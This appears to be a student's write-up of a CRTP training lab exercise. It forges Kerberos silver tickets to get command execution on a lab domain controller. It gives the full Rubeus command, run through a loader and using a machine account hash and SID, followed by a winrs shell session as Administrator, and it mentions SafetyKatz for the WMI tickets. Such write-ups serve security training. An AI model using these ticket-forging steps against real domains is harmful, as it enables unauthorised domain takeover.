CRTP Lab 9

Task 1

Try to get command execution on the domain controller by creating silver ticket for:

  • HTTP

  • WMI

Use the NTLM or AES hash of dcorp-dc to forge and import ticket:

Here, we use Rubeus for HTTP service.

# ArgSplit for "silver"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

Since the ticket is imported, we can get a shell as DC and execute commands.

C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

Let's also use SafetyKatz for WMI.

To access WMI, we need two tickets, one for HOST and another for RPCSS.

Let's get one for HOST first:

Now for RPCSS:

We can now check if the tickets are imported using klist

We can now run WMI commands on DC.

PreviousSilver TicketNextDiamond Ticket

Last updated